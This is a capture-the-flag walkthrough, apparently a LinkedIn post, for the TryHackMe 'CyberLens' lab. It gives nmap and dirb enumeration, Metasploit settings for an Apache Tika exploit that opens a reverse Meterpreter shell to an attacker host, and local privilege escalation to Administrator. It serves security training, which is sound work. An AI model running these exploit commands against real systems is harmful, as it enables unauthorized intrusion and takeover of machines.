CyberLens – TryHackMe Walkthrough

CyberLens – TryHackMe Walkthrough

Sondip Roy Sondip Roy

Sondip Roy

Aspiring Cyber Security Enthusiast | VAPT | CTF Player | Top 8% TryHackMe

发布日期: 2024年11月17日
+ 关注

This CTF challenge is rated as “easy” and is estimated to take around 120 minutes to complete. However, due to its intriguing mix of challenges, it took a little longer in my experience.

Update /etc/hosts:

Add the target IP to your /etc/hosts file to make navigation easier. 

sudo echo '10.10.81.123 cyberlens.thm' >> /etc/hosts

VM Startup Time:

Wait at least 5 minutes after starting the VM to ensure all services are fully operational.

Step 1: Enumeration

Start with an nmap scan to identify open ports and services: 

nmap -sVC -T5 cyberlens.thm

Key Findings: 

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.57 ((Win64))
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Step 2: Exploring the Web Server

Visit https://cyberlens.thm in your browser. Simultaneously, run a directory brute-forcing tool like dirb to uncover hidden paths: 

dirb <https://cyberlens.thm>

We now have to important link that we have to check.

Step 3: Analyzing the Image Extractor

While exploring the Image Extractor, a suspicious event occurs when clicking the "Get Metadata" button, pointing to an uncommon port. We can capture that data by inspecting. Open network tab and try to upload a image. We found a uncommon port cyberlens.thm:61777 .

领英推荐

Step 4: Exploiting the Vulnerability

Apache Tika Exploit

The Image Extractor leads us to Apache Tika, which is vulnerable to specific exploits. Let's search for Apache Tika on Metasploit.

Now, configure and execute the exploit: 

use exploit/windows/http/apache_tika_jp2_jscript
set RHOSTS 10.10.81.123
set RPORT 61777
set LHOST 10.17.87.86
set LPORT 4444
exploit

Result: Successfully gaining a Meterpreter session.

Step 5: Capturing the User Flag

Inside the Meterpreter shell, navigate to the user’s desktop and retrieve the first flag: 

cd C:\\Users\\CyberLens\\Desktop
cat user_flag.txt

Step 6: Admin Access:

Now we will open our msfconsle again and search for local exploit suggester. 

msf6 exploit(windows/http/apache_tika_jp2_jscript) > search local exploit suggester

Now we will go to options and set our running sessions. To see running sessions just type SESSION and set that and run.

We will now see some results. We are going to use the first one for our exploitation.

Set all the settings and run.

Bingo, we out the admin privilege. We just need to go to C:\\Users\\Administrator\\Desktop directory and we will get our final flag or admin flag.

要查看或添加评论,请登录

Sondip Roy的更多文章

社区洞察

其他会员也浏览了